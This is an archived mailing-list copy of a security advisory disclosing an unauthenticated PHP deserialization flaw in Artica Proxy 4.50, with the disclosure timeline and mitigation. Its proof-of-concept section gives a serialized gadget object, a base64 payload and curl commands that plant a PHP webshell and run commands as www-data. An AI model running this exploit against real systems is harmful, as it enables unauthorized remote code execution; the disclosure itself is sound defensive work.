lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <ac0c913d-36e1-43db-96db-ff2ce2a55891@korelogic.com>
Date: Tue, 5 Mar 2024 12:29:41 -0600
From: KoreLogic Disclosures via Fulldisclosure <fulldisclosure@...lists.org>
To: fulldisclosure@...lists.org
Subject: [FD] KL-001-2024-002: Artica Proxy Unauthenticated PHP
 Deserialization Vulnerability

KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
Advisory ID: KL-001-2024-002
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt


1. Vulnerability Details

      Affected Vendor: Artica
      Affected Product: Artica Proxy
      Affected Version: 4.50
      Platform: Debian 10 LTS
      CWE Classification: CWE-502 Deserialization of Untrusted Data
      CVE ID: CVE-2024-2054


2. Vulnerability Description

      The Artica Proxy administrative web application will deserialize
      arbitrary PHP objects supplied by unauthenticated users and
      subsequently enable code execution as the "www-data" user.


3. Technical Description

      Prior to authentication, a user can send an HTTP request
      to the "/wizard/wiz.wizard.progress.php" endpoint. This
      endpoint processes the "build-js" query parameter by base64
      decoding the provided value and then calling the "unserialize"
      PHP function with the decoded value as input.

      Code snippet from "wiz.wizard.progress.php":

        if(isset($_GET["build-js"])){buildjs();exit;}
        ...
        $ARRAY=unserialize(base64_decode($_GET["build-js"]));

      To exploit this vulnerability, a user can leverage the
      installed "Net_DNS2" library autoloader to instantiate the
      "Net_DNS2_Cache_File" class. The "__destruct" method
      within this class will write to arbitrary files defined
      by the class:

        public function __destruct()
        {
            //
            // if there's no cache file set, then there's nothing to do
            //
            if (strlen($this->cache_file) == 0) {
                return;
            }

            //
            // open the file for reading/writing
            //
            $fp = fopen($this->cache_file, 'a+');
            if ($fp !== false) {
            ...
            if (!is_null($data)) {

                //
                // write the file contents
                //
                fwrite($fp, $data);
            }

      An unauthenticated user can overwrite existing files and
      insert a webshell to execute malicious PHP as the "www-data"
      user.


4. Mitigation and Remediation Recommendation

      No response from vendor. This vulnerability can be remediated
      by deleting the 'usr/share/artica-postfix/wizard' directory
      if it is not needed. Otherwise, move it to a location outside
      of the web root.


5. Credit

      This vulnerability was discovered by Jaggar Henry of KoreLogic,
      Inc.


6. Disclosure Timeline

      2023.12.18 - KoreLogic requests vulnerability contact and
                   secure communication method from Artica.
      2023.12.18 - Artica Support issues automated ticket #1703011342
                   promising follow-up from a human.
      2024.01.10 - KoreLogic again requests vulnerability contact and
                   secure communication method from Artica.
      2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
                   mail.articatech.com with response
                   "Client host rejected: Go Away!"
      2024.01.11 - KoreLogic requests vulnerability contact and
                   secure communication method via
                   https://www.articatech.com/ 'Contact Us' web form.
      2024.01.23 - KoreLogic requests CVE from MITRE.
      2024.01.23 - MITRE issues automated ticket #1591692 promising
                   follow-up from a human.
      2024.02.01 - 30 business days have elapsed since KoreLogic
                   attempted to contact the vendor.
      2024.02.06 - KoreLogic requests update on CVE from MITRE.
      2024.02.15 - KoreLogic requests update on CVE from MITRE.
      2024.02.22 - KoreLogic reaches out to alternate CNA for
                   CVE identifiers.
      2024.02.26 - 45 business days have elapsed since KoreLogic
                   attempted to contact the vendor.
      2024.02.29 - Vulnerability details presented to AHA!
                   (takeonme.org) by proxy.
      2024.03.01 - AHA! issues CVE-2024-2054 to track this
                   vulnerability.
      2024.03.05 - KoreLogic public disclosure.


7. Proof of Concept

      To overwrite the "wiz.upload.php" file to contain a PHP
      webshell, the following serialized object can be base64
      encoded and submitted via the "build-js" query parameter:

O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php 
system($_GET['cmd']); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

        $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k 
"$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d" 
&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

      {"uid=33(www-data) gid=33(www-data) groups=33(www-data)
       ":{"cache_date":1696883506,"ttl":8303116493}}


The contents of this advisory are copyright(c) 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt


Download attachment "OpenPGP_signature.asc" of type "application/pgp-signature" (841 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ